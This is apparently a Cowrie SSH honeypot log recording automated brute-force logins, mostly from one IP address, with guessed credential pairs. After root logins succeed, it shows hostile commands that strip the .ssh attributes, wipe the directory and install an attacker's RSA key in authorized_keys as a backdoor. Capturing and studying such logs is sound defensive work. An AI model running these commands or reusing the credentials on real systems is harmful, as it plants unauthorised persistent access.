{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:04:37.875736Z","src_ip":"212.227.235.229","session":"a653eb0d998f"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:04:38.811576Z","src_ip":"212.227.235.229","session":"f70be60bdaf1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38718,"dst_ip":"1.2.3.4","dst_port":22,"session":"77818bb5be86","protocol":"ssh","message":"New connection: 212.227.235.229:38718 (1.2.3.4:22) [session: 77818bb5be86]","sensor":"my-vps","timestamp":"2025-09-08T22:04:41.498354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:04:41.562083Z","src_ip":"212.227.235.229","session":"77818bb5be86"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:04:41.764936Z","src_ip":"212.227.235.229","session":"77818bb5be86"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T22:04:42.593678Z","src_ip":"212.227.235.229","session":"77818bb5be86"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:04:43.799691Z","src_ip":"212.227.235.229","session":"77818bb5be86"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57184,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e5c8675dac6","protocol":"ssh","message":"New connection: 217.72.205.35:57184 (1.2.3.4:22) [session: 8e5c8675dac6]","sensor":"my-vps","timestamp":"2025-09-08T22:04:45.663952Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:04:45.665138Z","src_ip":"217.72.205.35","session":"8e5c8675dac6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49724,"dst_ip":"1.2.3.4","dst_port":22,"session":"9196c486acec","protocol":"ssh","message":"New connection: 212.227.235.229:49724 (1.2.3.4:22) [session: 9196c486acec]","sensor":"my-vps","timestamp":"2025-09-08T22:04:48.762192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:04:48.763610Z","src_ip":"212.227.235.229","session":"9196c486acec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:04:49.077496Z","src_ip":"212.227.235.229","session":"9196c486acec"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia2025","message":"login attempt [nvidia/nvidia2025] failed","sensor":"my-vps","timestamp":"2025-09-08T22:04:50.374354Z","src_ip":"212.227.235.229","session":"9196c486acec"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:04:51.690819Z","src_ip":"212.227.235.229","session":"9196c486acec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46378,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fe88b537e6c","protocol":"ssh","message":"New connection: 212.227.235.229:46378 (1.2.3.4:22) [session: 5fe88b537e6c]","sensor":"my-vps","timestamp":"2025-09-08T22:04:52.430835Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:04:55.393650Z","src_ip":"212.227.235.229","session":"5fe88b537e6c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:04:55.394786Z","src_ip":"212.227.235.229","session":"5fe88b537e6c"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:04:55.398032Z","src_ip":"212.227.235.229","session":"5fe88b537e6c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54064,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ec0c2756af8","protocol":"ssh","message":"New connection: 212.227.235.229:54064 (1.2.3.4:22) [session: 8ec0c2756af8]","sensor":"my-vps","timestamp":"2025-09-08T22:05:01.030315Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:05:07.039740Z","src_ip":"212.227.235.229","session":"8ec0c2756af8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:05:07.040759Z","src_ip":"212.227.235.229","session":"8ec0c2756af8"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:05:07.042967Z","src_ip":"212.227.235.229","session":"8ec0c2756af8"}
{"eventid":"cowrie.session.closed","duration":41.45848345756531,"message":"Connection lost after 41 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:05:10.635475Z","src_ip":"212.227.125.160","session":"79726ec7d218"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38540,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ab764b99e1f","protocol":"ssh","message":"New connection: 212.227.235.229:38540 (1.2.3.4:22) [session: 9ab764b99e1f]","sensor":"my-vps","timestamp":"2025-09-08T22:05:16.640361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:05:16.641296Z","src_ip":"212.227.235.229","session":"9ab764b99e1f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:05:16.978050Z","src_ip":"212.227.235.229","session":"9ab764b99e1f"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin123!!","message":"login attempt [root/Admin123!!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:05:18.356169Z","src_ip":"212.227.235.229","session":"9ab764b99e1f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:05:19.087416Z","src_ip":"212.227.235.229","session":"9ab764b99e1f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:05:19.088115Z","src_ip":"212.227.235.229","session":"9ab764b99e1f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:05:19.089564Z","src_ip":"212.227.235.229","session":"9ab764b99e1f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:05:19.425091Z","src_ip":"212.227.235.229","session":"9ab764b99e1f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:05:20.242390Z","src_ip":"212.227.235.229","session":"9ab764b99e1f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:05:20.243134Z","src_ip":"212.227.235.229","session":"9ab764b99e1f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:05:20.585840Z","src_ip":"212.227.235.229","session":"9ab764b99e1f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:05:20.586869Z","src_ip":"212.227.235.229","session":"9ab764b99e1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38548,"dst_ip":"1.2.3.4","dst_port":22,"session":"44a2dfa048d2","protocol":"ssh","message":"New connection: 212.227.235.229:38548 (1.2.3.4:22) [session: 44a2dfa048d2]","sensor":"my-vps","timestamp":"2025-09-08T22:05:20.914529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:05:20.915444Z","src_ip":"212.227.235.229","session":"44a2dfa048d2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:05:21.250858Z","src_ip":"212.227.235.229","session":"44a2dfa048d2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:05:22.626259Z","src_ip":"212.227.235.229","session":"44a2dfa048d2"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:05:23.961411Z","src_ip":"212.227.235.229","session":"44a2dfa048d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38556,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a87793ffda0","protocol":"ssh","message":"New connection: 212.227.235.229:38556 (1.2.3.4:22) [session: 0a87793ffda0]","sensor":"my-vps","timestamp":"2025-09-08T22:05:24.292464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:05:24.293411Z","src_ip":"212.227.235.229","session":"0a87793ffda0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:05:24.626378Z","src_ip":"212.227.235.229","session":"0a87793ffda0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56670,"dst_ip":"1.2.3.4","dst_port":22,"session":"694a50bb5222","protocol":"ssh","message":"New connection: 212.227.235.229:56670 (1.2.3.4:22) [session: 694a50bb5222]","sensor":"my-vps","timestamp":"2025-09-08T22:05:25.723349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:05:25.724461Z","src_ip":"212.227.235.229","session":"694a50bb5222"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:05:25.900039Z","src_ip":"212.227.235.229","session":"694a50bb5222"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:05:25.990701Z","src_ip":"212.227.235.229","session":"0a87793ffda0"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:05:26.324564Z","src_ip":"212.227.235.229","session":"0a87793ffda0"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:05:26.327032Z","src_ip":"212.227.235.229","session":"9ab764b99e1f"}
{"eventid":"cowrie.login.success","username":"root","password":"Xdaknc8z","message":"login attempt [root/Xdaknc8z] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:05:26.644918Z","src_ip":"212.227.235.229","session":"694a50bb5222"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:05:27.049783Z","src_ip":"212.227.235.229","session":"694a50bb5222"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:05:27.050477Z","src_ip":"212.227.235.229","session":"694a50bb5222"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:05:27.051699Z","src_ip":"212.227.235.229","session":"694a50bb5222"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:05:27.228241Z","src_ip":"212.227.235.229","session":"694a50bb5222"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:05:27.596451Z","src_ip":"212.227.235.229","session":"694a50bb5222"}
